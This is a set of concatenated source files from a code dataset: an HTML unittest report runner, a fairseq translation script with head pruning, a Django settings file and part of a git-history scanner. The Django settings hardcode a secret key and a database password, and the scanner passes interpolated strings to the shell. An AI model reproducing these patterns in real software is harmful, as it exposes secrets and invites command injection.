        <!-- Expand error details by default -Findyou -->
<button id='btn_%(tid)s' type="button" class="btn btn-danger btn-xs" data-toggle="collapse" data-target='#div_%(tid)s'>%(status)s</button>
<div id='div_%(tid)s' class="collapse in">
<pre>
%(script)s
</pre>
</div>
</td>
</tr>
""" # variables: (tid, Class, style, desc, status)
    # Style for passed cases, with a label badge effect -Findyou
REPORT_TEST_NO_OUTPUT_TMPL = r"""
<tr id='%(tid)s' class='%(Class)s'>
<td class='%(style)s'><div class='testcase'>%(desc)s</div></td>
<td colspan='5' align='center'><span class="label label-success success">%(status)s</span></td>
</tr>
""" # variables: (tid, Class, style, desc, status)
REPORT_TEST_OUTPUT_TMPL = r"""
%(id)s: %(output)s
<img %(hidde)s src="%(image)s" alt="picture_shot" height="480" width="800"></img>
<a %(hidde)s href="%(image)s">picture_shot</a>
""" # variables: (id, output)
# ------------------------------------------------------------------------
# ENDING
#
    # Added a back-to-top button --Findyou
ENDING_TMPL = """<div id='ending'> </div>
<div style=" position:fixed;right:50px; bottom:30px; width:20px; height:20px;cursor:pointer">
<a href="#"><span class="glyphicon glyphicon-eject" style = "font-size:30px;" aria-hidden="true">
</span></a></div>
"""
# -------------------- The end of the Template class -------------------
TestResult = unittest.TestResult
class _TestResult(TestResult):
# note: _TestResult is a pure representation of results.
    # It lacks the output and reporting ability compared to unittest._TextTestResult.
def __init__(self, verbosity=1):
TestResult.__init__(self)
self.stdout0 = None
self.stderr0 = None
self.success_count = 0
self.failure_count = 0
self.error_count = 0
self.verbosity = verbosity
# result is a list of result in 4 tuple
# (
# result code (0: success; 1: fail; 2: error),
# TestCase object,
# Test output (byte string),
# stack trace,
# )
self.result = []
        # Added a test pass-rate field --Findyou
self.passrate=float(0)
def startTest(self, test):
TestResult.startTest(self, test)
# just one buffer for both stdout and stderr
self.outputBuffer = io.StringIO()
stdout_redirector.fp = self.outputBuffer
stderr_redirector.fp = self.outputBuffer
self.stdout0 = sys.stdout
self.stderr0 = sys.stderr
sys.stdout = stdout_redirector
sys.stderr = stderr_redirector
def complete_output(self):
"""
Disconnect output redirection and return buffer.
Safe to call multiple times.
"""
if self.stdout0:
sys.stdout = self.stdout0
sys.stderr = self.stderr0
self.stdout0 = None
self.stderr0 = None
return self.outputBuffer.getvalue()
def stopTest(self, test):
# Usually one of addSuccess, addError or addFailure would have been called.
        # But there are some paths in unittest that would bypass this.
# We must disconnect stdout in stopTest(), which is guaranteed to be called.
self.complete_output()
def addSuccess(self, test):
self.success_count += 1
TestResult.addSuccess(self, test)
output = self.complete_output()
self.result.append((0, test, output, ''))
if self.verbosity > 1:
sys.stderr.write('ok ')
sys.stderr.write(str(test))
sys.stderr.write('\n')
else:
sys.stderr.write('.')
def addError(self, test, err):
self.error_count += 1
TestResult.addError(self, test, err)
_, _exc_str = self.errors[-1]
output = self.complete_output()
self.result.append((2, test, output, _exc_str))
if self.verbosity > 1:
sys.stderr.write('E ')
sys.stderr.write(str(test))
sys.stderr.write('\n')
else:
sys.stderr.write('E')
def addFailure(self, test, err):
self.failure_count += 1
TestResult.addFailure(self, test, err)
_, _exc_str = self.failures[-1]
output = self.complete_output()
self.result.append((1, test, output, _exc_str))
if self.verbosity > 1:
sys.stderr.write('F ')
sys.stderr.write(str(test))
sys.stderr.write('\n')
else:
sys.stderr.write('F')
class HTMLTestRunner(Template_mixin):
"""
"""
def __init__(self, stream=sys.stdout, verbosity=1,title=None,description=None,tester=None):
self.stream = stream
self.verbosity = verbosity
if title is None:
self.title = self.DEFAULT_TITLE
else:
self.title = title
if description is None:
self.description = self.DEFAULT_DESCRIPTION
else:
self.description = description
if tester is None:
self.tester = self.DEFAULT_TESTER
else:
self.tester = tester
self.startTime = datetime.datetime.now()
def run(self, test):
"Run the given stUDY case or stUDY suite."
result = _TestResult(self.verbosity)
test(result)
self.stopTime = datetime.datetime.now()
self.generateReport(test, result)
print('\nTime Elapsed: %s' % (self.stopTime-self.startTime), file=sys.stderr)
return result
def sortResult(self, result_list):
        # unittest does not seem to run tests in any particular order.
# Here at least we want to group them together by class.
rmap = {}
classes = []
for n,t,o,e in result_list:
cls = t.__class__
if cls not in rmap:
rmap[cls] = []
classes.append(cls)
rmap[cls].append((n,t,o,e))
r = [(cls, rmap[cls]) for cls in classes]
return r
    # Replaced the test-result status with the pass rate --Findyou
def getReportAttributes(self, result):
"""
Return report attributes as a list of (name, value).
Override this to add custom attributes.
"""
startTime = str(self.startTime)[:19]
duration = str(self.stopTime - self.startTime)
status = []
status.append('共 %s' % (result.success_count + result.failure_count + result.error_count))
if result.success_count: status.append('通过 %s' % result.success_count)
if result.failure_count: status.append('失败 %s' % result.failure_count)
if result.error_count: status.append('错误 %s' % result.error_count )
if status:
status = ','.join(status)
self.passrate = str("%.2f%%" % (float(result.success_count) / float(result.success_count + result.failure_count + result.error_count) * 100))
else:
status = 'none'
return [
('测试人员', self.tester),
('开始时间',startTime),
('合计耗时',duration),
('测试结果',status + ",通过率= "+self.passrate),
]
def generateReport(self, test, result):
report_attrs = self.getReportAttributes(result)
generator = 'HTMLTestRunner %s' % __version__
stylesheet = self._generate_stylesheet()
heading = self._generate_heading(report_attrs)
report = self._generate_report(result)
ending = self._generate_ending()
output = self.HTML_TMPL % dict(
title = saxutils.escape(self.title),
generator = generator,
stylesheet = stylesheet,
heading = heading,
report = report,
ending = ending,
)
self.stream.write(output.encode('utf8'))
def _generate_stylesheet(self):
return self.STYLESHEET_TMPL
    # Added tester display -Findyou
def _generate_heading(self, report_attrs):
a_lines = []
for name, value in report_attrs:
line = self.HEADING_ATTRIBUTE_TMPL % dict(
name = saxutils.escape(name),
value = saxutils.escape(value),
)
a_lines.append(line)
heading = self.HEADING_TMPL % dict(
title = saxutils.escape(self.title),
parameters = ''.join(a_lines),
description = saxutils.escape(self.description),
tester= saxutils.escape(self.tester),
)
return heading
    # Generate the report --comment added by Findyou
def _generate_report(self, result):
rows = []
sortedResult = self.sortResult(result.result)
for cid, (cls, cls_results) in enumerate(sortedResult):
# subtotal for a class
np = nf = ne = 0
for n,t,o,e in cls_results:
if n == 0: np += 1
elif n == 1: nf += 1
else: ne += 1
# format class description
if cls.__module__ == "__main__":
name = cls.__name__
else:
name = "%s.%s" % (cls.__module__, cls.__name__)
doc = cls.__doc__ and cls.__doc__.split("\n")[0] or ""
desc = doc and '%s: %s' % (name, doc) or name
row = self.REPORT_CLASS_TMPL % dict(
style = ne > 0 and 'errorClass' or nf > 0 and 'failClass' or 'passClass',
desc = desc,
count = np+nf+ne,
Pass = np,
fail = nf,
error = ne,
cid = 'c%s' % (cid+1),
)
rows.append(row)
for tid, (n,t,o,e) in enumerate(cls_results):
self._generate_report_test(rows, cid, tid, n, t, o, e)
report = self.REPORT_TMPL % dict(
test_list = ''.join(rows),
count = str(result.success_count+result.failure_count+result.error_count),
Pass = str(result.success_count),
fail = str(result.failure_count),
error = str(result.error_count),
passrate =self.passrate,
)
return report
def _generate_report_test(self, rows, cid, tid, n, t, o, e):
        # o: printed output
        # e: raised exception info
        # t: the specific test case
# e.g. 'pt1.1', 'ft1.1', etc
has_output = bool(o or e)
        # REPORT_TEST_WITH_OUTPUT_TMPL is used whenever there is printed output or a raised exception
#has_output = bool(o and e)
        # Dots in IDs replaced with underscores to support the Bootstrap collapse/expand effect - Findyou
tid = (n == 0 and 'p' or 'f') + 't%s_%s' % (cid+1,tid+1)
#tid = '%s_%s' % (cid+1,tid+1)
name = t.id().split('.')[-1]
doc = t.shortDescription() or ""
desc = doc and ('%s: %s' % (name, doc)) or name
tmpl = has_output and self.REPORT_TEST_WITH_OUTPUT_TMPL or self.REPORT_TEST_NO_OUTPUT_TMPL
        # utf-8, supports Chinese - Findyou
# o and e should be byte string because they are collected from stdout and stderr?
if isinstance(o, str):
            # TODO: some problem with 'string_escape': it escapes \n and messes up formatting
# uo = unicode(o.encode('string_escape'))
# uo = o.decode('latin-1')
uo = o
else:
uo = o
if isinstance(e, str):
            # TODO: some problem with 'string_escape': it escapes \n and messes up formatting
# ue = unicode(e.encode('string_escape'))
# ue = e.decode('latin-1')
ue = e
else:
ue = e
        # Insert screenshot image
unum = str(uo).find('screenshots')
if (uo and unum != -1):
hidde_status = ''
#image_url = 'file:///'+uo
image_url = '../report/screenshots/' + str(uo)[unum + 11:unum + 36].replace(' ', '')
else:
hidde_status = '''hidden="hidden"'''
image_url = ''
script = self.REPORT_TEST_OUTPUT_TMPL % dict(
id = tid[2:],
#output = saxutils.escape(uo+ue),
output = saxutils.escape(ue),
hidde=hidde_status,
image=image_url,
)
row = tmpl % dict(
tid = tid,
Class = (n == 0 and 'hiddenRow' or 'none'),
style = n == 2 and 'errorCase' or (n == 1 and 'failCase' or 'passCase'),
desc = desc,
script = script,
hidde = hidde_status,
image = image_url,
status = self.STATUS[n],
)
rows.append(row)
if not has_output:
return
def _generate_ending(self):
return self.ENDING_TMPL
##############################################################################
# Facilities for running tests from the command line
##############################################################################
# Note: Reuse unittest.TestProgram to launch tests. In the future we may
# build our own launcher to support more specific command line
# parameters like test title, CSS, etc.
class TestProgram(unittest.TestProgram):
"""
A variation of the unittest.TestProgram. Please refer to the base
class for command line parameters.
"""
def runTests(self):
        # Pick HTMLTestRunner as the default test runner.
# base class's testRunner parameter is not useful because it means
# we have to instantiate HTMLTestRunner before we know self.verbosity.
if self.testRunner is None:
self.testRunner = HTMLTestRunner(verbosity=self.verbosity)
unittest.TestProgram.runTests(self)
main = TestProgram
##############################################################################
# Executing this module from the command line
##############################################################################
if __name__ == "__main__":
main(module=None)
authors: ["1259917952@qq.com"]
author_id: 1259917952@qq.com

blob_id: f555f4db1b57f5a3fdb41deb28cc1c6151bd4ea2
directory_id: 6cde76beabb943b4de4ab9f7516ebffca51f6da6
path: /generate.py
content_id: ea8517289fa84e335e308416701d7c7449ebf6f2
detected_licenses: []
license_type: no_license
repo_name: A1exRey/ReflectionOfNAR
snapshot_id: 801bf23eb098f03e663f89f553355f43eb6a7d9e
revision_id: 79ed86873322d45cbfc28f98a4e224c961d5bad2
branch_name: refs/heads/main
visit_date: 2023-05-13T23:00:54.703916
revision_date: 2021-06-01T11:01:02
committer_date: 2021-06-01T11:01:02
github_id: 372,795,504
star_events_count: 0
fork_events_count: 0
gha_license_id: null
gha_event_created_at: null
gha_created_at: null
gha_language: null
src_encoding: UTF-8
language: Python
is_vendor: false
is_generated: false
length_bytes: 10,600
extension: py
content:
#!/usr/bin/env python3 -u
# Copyright (c) 2017-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the license found in the LICENSE file in
# the root directory of this source tree. An additional grant of patent rights
# can be found in the PATENTS file in the same directory.
"""
Translate pre-processed data with a trained model.
"""
import torch
from fairseq import bleu, checkpoint_utils, options, progress_bar, tasks, utils
from fairseq.meters import StopwatchMeter, TimeMeter
import re
from interactive import translate_corpus, parse_head_pruning_descriptors, mask_heads
def main(args):
assert args.path is not None, '--path required for generation!'
assert not args.sampling or args.nbest == args.beam, \
'--sampling requires --nbest to be equal to --beam'
assert args.replace_unk is None or args.raw_text, \
'--replace-unk requires a raw text dataset (--raw-text)'
utils.import_user_module(args)
if args.max_tokens is None and args.max_sentences is None:
args.max_tokens = 12000
print(args)
use_cuda = torch.cuda.is_available() and not args.cpu
# Load dataset splits
task = tasks.setup_task(args)
task.load_dataset(args.gen_subset)
# Set dictionaries
try:
src_dict = getattr(task, 'source_dictionary', None)
except NotImplementedError:
src_dict = None
tgt_dict = task.target_dictionary
# Load ensemble
print('| loading model(s) from {}'.format(args.path))
models, _model_args = checkpoint_utils.load_model_ensemble(
args.path.split(':'),
arg_overrides=eval(args.model_overrides),
task=task,
)
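    # Successive experimental head-pruning configurations; only the last assignment below takes effect.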
to_prune = {'E': {}, 'A': {}, 'D': {}}
to_prune = {'E': {0: {0, 1, 2, 3, 4, 5, 6, 7}, 1: {2, 4, 7}, 2: {3}}, 'A': {}, 'D': {}}
to_prune = {'E': {0: {0, 1, 2, 3, 4, 5, 6, 7}, 1: {2, 4, 7}, 2: {3, 7}, 4: {0, 3, 7}, 5: {0, 7}, 11: {2, 5}, 6: {0}, 9: {3}, 3: {0}}, 'A': {}, 'D': {}}
to_prune = {'E': {0: {0, 1, 2, 3, 4, 5, 6, 7}, 1: {0, 1, 2, 4, 6, 7}, 2: {3, 5, 7}, 3: {0, 1, 4}, 4: {0, 2, 3, 7}, 5: {0, 7}, 6: {0, 1}, 9: {3}, 11: {2, 5}, 10: {0, 3}}, 'A': {0: {1}}, 'D': {}}
to_prune = {'E': {0: {0, 1, 2, 3, 4, 5, 6, 7}, 1: {0, 1, 2, 4, 6, 7}, 2: {3, 5, 7}, 3: {0, 1, 4, 6}, 4: {0, 2, 3, 7}, 5: {0, 3, 7}, 6: {0, 1, 2}, 9: {1, 3, 6}, 10: {0, 3, 5}, 11: {2, 5, 7}, 8: {3, 4, 5, 7}}, 'A': {0: {1}}, 'D': {}}
to_prune = {'E': {0: {0, 1, 2, 3, 4, 5, 6, 7}, 1: {0, 1, 2, 4, 5, 6, 7}, 2: {0, 3, 5, 7}, 3: {0, 1, 4, 5, 6}, 4: {0, 1, 2, 3, 7}, 5: {0, 2, 3, 4, 5, 7}, 6: {0, 1, 2, 3, 6}, 8: {3, 4, 5, 7}, 9: {1, 3, 6}, 10: {0, 3, 5}, 11: {2, 5, 7}, 7: {2, 4}}, 'A': {0: {1}}, 'D': {}}
to_prune = {'E': {0: {0, 1, 2, 3, 4, 5, 6, 7}, 1: {0, 1, 2, 4, 5, 6, 7}, 2: {0, 2, 3, 4, 5, 6, 7}, 3: {0, 1, 4, 5, 6}, 4: {0, 1, 2, 3, 6, 7}, 5: {0, 2, 3, 4, 5, 7}, 6: {0, 1, 2, 3, 6}, 7: {2, 4, 6}, 8: {0, 3, 4, 5, 6, 7}, 9: {1, 3, 6}, 10: {0, 1, 3, 5, 7}, 11: {0, 2, 5, 7}}, 'A': {0: {1}}, 'D': {0: {1, 4}}}
to_prune = {'E': {0: {0, 1, 2, 3, 4, 5, 6, 7}, 1: {0, 1, 2, 3, 4, 5, 6, 7}, 2: {0, 2, 3, 4, 5, 6, 7}, 3: {0, 1, 3, 4, 5, 6, 7}, 4: {0, 1, 2, 3, 4, 5, 6, 7}, 5: {0, 2, 3, 4, 5, 6, 7}, 6: {0, 1, 2, 3, 6, 7}, 7: {0, 2, 3, 4, 6}, 8: {0, 3, 4, 5, 6, 7}, 9: {1, 2, 3, 6, 7}, 10: {0, 1, 3, 5, 7}, 11: {0, 2, 5, 7}}, 'A': {0: {1}}, 'D': {0: {1, 4}}}
to_prune = {'E': {0: {0, 1, 2, 3, 4, 5, 6, 7}, 1: {0, 1, 2, 3, 4, 5, 6, 7}, 2: {0, 1, 2, 3, 4, 5, 6, 7}, 3: {0, 1, 3, 4, 5, 6, 7}, 4: {0, 1, 2, 3, 4, 5, 6, 7}, 5: {0, 1, 2, 3, 4, 5, 6, 7}, 6: {0, 1, 2, 3, 5, 6, 7}, 7: {0, 2, 3, 4, 6, 7}, 8: {0, 1, 3, 4, 5, 6, 7}, 9: {1, 2, 3, 6, 7}, 10: {0, 1, 2, 3, 5, 7}, 11: {0, 2, 5, 6, 7}}, 'A': {0: {1, 4, 7}}, 'D': {0: {0, 1, 4, 7}}}
#to_prune = {'E': {0: {0, 1, 2, 3, 4, 5, 6, 7}, 1: {0, 1, 2, 3, 4, 5, 6, 7}, 2: {0, 1, 2, 3, 4, 5, 6, 7}, 3: {0, 1, 2, 3, 4, 5, 6, 7}, 4: {0, 1, 2, 3, 4, 5, 6, 7}, 5: {0, 1, 2, 3, 4, 5, 6, 7}, 6: {0, 1, 2, 3, 4, 5, 6, 7}, 7: {0, 2, 3, 4, 5, 6, 7}, 8: {0, 1, 2, 3, 4, 5, 6, 7}, 9: {1, 2, 3, 4, 5, 6, 7}, 10: {0, 1, 2, 3, 5, 7}, 11: {0, 2, 5, 6, 7}}, 'A': {0: {0, 1, 2, 3, 4, 5, 6, 7}}, 'D': {0: {0, 1, 4, 7}}}
# Optimize ensemble for generation
for model in models:
mask_heads(model, to_prune, False)
model.make_generation_fast_(
beamable_mm_beam_size=None if args.no_beamable_mm else args.beam,
need_attn=args.print_alignment,
)
if args.fp16:
model.half()
if use_cuda:
model.cuda()
# Load alignment dictionary for unknown word replacement
# (None if no unknown word replacement, empty if no path to align dictionary)
align_dict = utils.load_align_dict(args.replace_unk)
# Load dataset (possibly sharded)
itr = task.get_batch_iterator(
dataset=task.dataset(args.gen_subset),
max_tokens=args.max_tokens,
max_sentences=args.max_sentences,
max_positions=utils.resolve_max_positions(
task.max_positions(),
*[model.max_positions() for model in models]
),
ignore_invalid_inputs=args.skip_invalid_size_inputs_valid_test,
required_batch_size_multiple=args.required_batch_size_multiple,
num_shards=args.num_shards,
shard_id=args.shard_id,
num_workers=args.num_workers,
).next_epoch_itr(shuffle=False)
# Initialize generator
gen_timer = StopwatchMeter()
generator = task.build_generator(models,args)
# Generate and compute BLEU score
if args.sacrebleu:
scorer = bleu.SacrebleuScorer()
else:
scorer = bleu.Scorer(tgt_dict.pad(), tgt_dict.eos(), tgt_dict.unk())
num_sentences = 0
has_target = True
with progress_bar.build_progress_bar(args, itr) as t:
wps_meter = TimeMeter()
for sample in t:
sample = utils.move_to_cuda(sample) if use_cuda else sample
if 'net_input' not in sample:
continue
prefix_tokens = None
if args.prefix_size > 0:
prefix_tokens = sample['target'][:, :args.prefix_size]
gen_timer.start()
hypos = task.inference_step(generator, models, sample, prefix_tokens)
num_generated_tokens = sum(len(h[0]['tokens']) for h in hypos)
gen_timer.stop(num_generated_tokens)
for i, sample_id in enumerate(sample['id'].tolist()):
has_target = sample['target'] is not None
# Remove padding
src_tokens = utils.strip_pad(sample['net_input']['src_tokens'][i, :], tgt_dict.pad())
target_tokens = None
if has_target:
target_tokens = utils.strip_pad(sample['target'][i, :], tgt_dict.pad()).int().cpu()
# Either retrieve the original sentences or regenerate them from tokens.
if align_dict is not None:
src_str = task.dataset(args.gen_subset).src.get_original_text(sample_id)
target_str = task.dataset(args.gen_subset).tgt.get_original_text(sample_id)
else:
if src_dict is not None:
src_str = src_dict.string(src_tokens, args.remove_bpe)
else:
src_str = ""
if has_target:
target_str = tgt_dict.string(target_tokens, args.remove_bpe, escape_unk=True)
if not args.quiet:
if src_dict is not None:
print('S-{}\t{}'.format(sample_id, src_str))
if has_target:
print('T-{}\t{}'.format(sample_id, target_str))
# Process top predictions
for j, hypo in enumerate(hypos[i][:args.nbest]):
hypo_tokens, hypo_str, alignment = utils.post_process_prediction(
hypo_tokens=hypo['tokens'].int().cpu(),
src_str=src_str,
alignment=hypo['alignment'].int().cpu() if hypo['alignment'] is not None else None,
align_dict=align_dict,
tgt_dict=tgt_dict,
remove_bpe=args.remove_bpe,
)
if not args.quiet:
print('H-{}\t{}\t{}'.format(sample_id, hypo['score'], hypo_str))
print('P-{}\t{}'.format(
sample_id,
' '.join(map(
lambda x: '{:.4f}'.format(x),
hypo['positional_scores'].tolist(),
))
))
if args.print_alignment:
print('A-{}\t{}'.format(
sample_id,
' '.join(map(lambda x: str(utils.item(x)), alignment))
))
# Score only the top hypothesis
if has_target and j == 0:
if align_dict is not None or args.remove_bpe is not None:
# Convert back to tokens for evaluation with unk replacement and/or without BPE
target_tokens = tgt_dict.encode_line(target_str, add_if_not_exist=True)
if hasattr(scorer, 'add_string'):
if args.dehyphenate:
print('dehyphenating')
target_str = dehyphenate(target_str)
hypo_str = dehyphenate(hypo_str)
scorer.add_string(target_str, hypo_str)
else:
scorer.add(target_tokens, hypo_tokens)
wps_meter.update(num_generated_tokens)
t.log({'wps': round(wps_meter.avg)})
num_sentences += sample['nsentences']
print('| Translated {} sentences ({} tokens) in {:.1f}s ({:.2f} sentences/s, {:.2f} tokens/s)'.format(
num_sentences, gen_timer.n, gen_timer.sum, num_sentences / gen_timer.sum, 1. / gen_timer.avg))
if has_target:
print('| Generate {} with beam={}: {}'.format(args.gen_subset, args.beam, scorer.result_string()))
return scorer
def cli_main():
parser = options.get_generation_parser()
args = options.parse_args_and_arch(parser)
main(args)
def dehyphenate(sent):
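    # WMT-style hyphen splitting: "foo-bar" -> "foo @-@ bar".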
return re.sub(r'(\S)-(\S)', r'\1 ##AT##-##AT## \2', sent).replace('##AT##', '@')
if __name__ == '__main__':
cli_main()
authors: ["noreply@github.com"]
author_id: A1exRey.noreply@github.com

blob_id: dec10d527a3cc3635dbf388df8da39c4076d1195
directory_id: aecf94d703af89b2d93d8fe84576da045f9f61f7
path: /mysite/settings.py
content_id: 9d1eb43125cd0cd6f1ea0fe6090d8d9e6d6c1f46
detected_licenses: []
license_type: no_license
repo_name: ikkun/django_web
snapshot_id: 839104e9735589e7d28fa3cb6abd3fe8e869a52e
revision_id: 8bf04c01a82f0c82bd17aefda1ddf437fae4f670
branch_name: refs/heads/master
visit_date: 2020-08-28T08:51:40.861625
revision_date: 2020-02-23T04:11:00
committer_date: 2020-02-23T04:11:00
github_id: 217,651,771
star_events_count: 0
fork_events_count: 0
gha_license_id: null
gha_event_created_at: null
gha_created_at: null
gha_language: null
src_encoding: UTF-8
language: Python
is_vendor: false
is_generated: false
length_bytes: 5,692
extension: py
content:
"""
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 2.2.5.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'a!z-ghwrur8-h#lf(tyokmbn-x15x%og3%a4$b321a-&i94-pt'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
TINYMCE_DEFAULT_CONFIG = {
'height': 360,
'width': 1120,
'cleanup_on_startup': True,
'custom_undo_redo_levels': 20,
'selector': 'textarea',
'theme': 'modern',
'plugins': '''
textcolor save link image media preview codesample contextmenu
table code lists fullscreen insertdatetime nonbreaking
contextmenu directionality searchreplace wordcount visualblocks
visualchars code fullscreen autolink lists charmap print hr
anchor pagebreak
''',
'toolbar1': '''
fullscreen preview bold italic underline | fontselect,
fontsizeselect | forecolor backcolor | alignleft alignright |
aligncenter alignjustify | indent outdent | bullist numlist table |
| link image media | codesample |
''',
'toolbar2': '''
visualblocks visualchars |
charmap hr pagebreak nonbreaking anchor | code |
''',
'contextmenu': 'formats | link image',
'menubar': True,
'statusbar': True,
}
INSTALLED_APPS = [
'main.apps.MainConfig',
'programming.apps.ProgrammingConfig',
'budget.apps.BudgetConfig',
'blog.apps.BlogConfig',
'users.apps.UsersConfig',
'core.apps.CoreConfig',
'secmgr',
'socalert',
'todo',
'tinymce',
'crispy_forms',
'rest_framework',
'rest_framework.authtoken',
'rest_auth',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mysite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
# DATABASES = {
# 'default': {
# 'ENGINE': 'django.db.backends.sqlite3',
# 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
# }
# }
DATABASES = {
'default': {
'ENGINE': 'sql_server.pyodbc',
'NAME': 'tutorial',
'USER': 'sa',
'PASSWORD': 'password123',
        'HOST': '127.0.0.1\\sqlexpress',
# 'PORT': '1433',
'OPTIONS': {
'driver': 'ODBC Driver 13 for SQL Server',
},
},
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Asia/Bangkok'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
MEDIA_ROOT = os.path.join(BASE_DIR,'media')
MEDIA_URL = '/media/'
CRISPY_TEMPLATE_PACK = 'bootstrap4'
LOGIN_REDIRECT_URL = 'blog-home'
LOGIN_URL = 'login'
REST_FRAMEWORK = {
# 'DEFAULT_AUTHENTICATION_CLASSES': [
# 'rest_framework.authentication.TokenAuthentication'
# ],
'DEFAULT_RENDERER_CLASSES': (
#UnicodeJSONRenderer has an ensure_ascii = False attribute,
#thus it will not escape characters.
'rest_framework.renderers.UnicodeJSONRenderer',
#You only need to keep this one if you're using the browsable API
'rest_framework.renderers.BrowsableAPIRenderer',
),
'DEFAULT_PERMISSION_CLASSES':[
'rest_framework.permissions.IsAuthenticated'
],
'DEFAULT_AUTHENTICATION_CLASSES': [
'rest_framework_simplejwt.authentication.JWTAuthentication'
],
}
authors: ["ikkunanny@gmail.com"]
author_id: ikkunanny@gmail.com

blob_id: d670fc71f610fb31b49e00a8c5c71b54ca6ed4ef
directory_id: 83a59e255f681e85828399c6c2323f2cf0997e10
path: /kibble/scanners/scanners/git-evolution.py
content_id: 8f4a83698faccdae147d2985f32bfb605884f6ff
detected_licenses: ["Apache-2.0", "BSD-3-Clause", "MIT"]
license_type: permissive
repo_name: kaxil/kibble
snapshot_id: f4ab6f1039086adcb37c544c60bbbc27e8538128
revision_id: 96959acec06fed4d91d5da73fee1aa1200ffbb3c
branch_name: refs/heads/main
visit_date: 2023-02-01T03:14:53.813091
revision_date: 2020-12-16T23:04:45
committer_date: 2020-12-16T23:04:45
github_id: 320,881,184
star_events_count: 1
fork_events_count: 0
gha_license_id: Apache-2.0
gha_event_created_at: 2020-12-12T17:04:54
gha_created_at: 2020-12-12T17:04:54
gha_language: null
src_encoding: UTF-8
language: Python
is_vendor: false
is_generated: false
length_bytes: 8,447
extension: py
content:
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
""" Git Evolution scanner """
import calendar
import datetime
import hashlib
import os
import subprocess
import time
from kibble.configuration import conf
from kibble.scanners.utils import sloc
title = "Git Evolution Scanner"
version = "0.1.0"
def accepts(source):
""" Do we accept this source? """
if source["type"] == "git":
return True
# There are cases where we have a github repo, but don't wanna analyze the code, just issues
if source["type"] == "github" and source.get("issuesonly", False) == False:
return True
return False
def get_first_ref(gpath):
try:
return subprocess.check_output(
"cd %s && git log `git rev-list --max-parents=0 HEAD` --pretty=format:%%ct"
% gpath,
shell=True,
)
except: # pylint: disable=bare-except
print("Could not get first ref, exiting!")
return None
def acquire(kibble_bit, source):
source["steps"]["evolution"] = {
"time": time.time(),
"status": "Evolution scan started at "
+ time.strftime("%a, %d %b %Y %H:%M:%S +0000", time.gmtime()),
"running": True,
"good": True,
}
kibble_bit.update_source(source)
def release(kibble_bit, source, status, exception=None, good=False):
source["steps"]["evolution"] = {
"time": time.time(),
"status": status,
"running": False,
"good": good,
}
if exception:
source["steps"]["evolution"].update({"exception": exception})
kibble_bit.update_source(source)
def check_branch(gpath, date, branch):
try:
subprocess.check_call(
'cd %s && git rev-list -n 1 --before="%s" %s' % (gpath, date, branch),
shell=True,
)
return True
except: # pylint: disable=bare-except
return False
def checkout(gpath, date, branch):
# print("Ready to cloc...checking out %s " % date)
try:
ref = (
subprocess.check_output(
'cd %s && git rev-list -n 1 --before="%s" "%s"' % (gpath, date, branch),
shell=True,
stderr=subprocess.STDOUT,
)
.decode("ascii", "replace")
.strip()
)
subprocess.check_output(
"cd %s && git checkout %s -- " % (gpath, ref),
shell=True,
stderr=subprocess.STDOUT,
)
except subprocess.CalledProcessError as err:
print(err.output)
def find_branch(date, gpath):
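    # Prefer "master" if it existed at the given date; otherwise fall back to the currently checked-out branch.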
try:
os.chdir(gpath)
subprocess.check_call(
'cd %s && git rev-list -n 1 --before="%s" master' % (gpath, date),
shell=True,
stderr=subprocess.DEVNULL,
)
return "master"
except: # pylint: disable=bare-except
os.chdir(gpath)
try:
return (
subprocess.check_output(
"cd %s && git rev-parse --abbrev-ref HEAD" % gpath,
shell=True,
stderr=subprocess.DEVNULL,
)
.decode("ascii", "replace")
.strip()
.strip("* ")
)
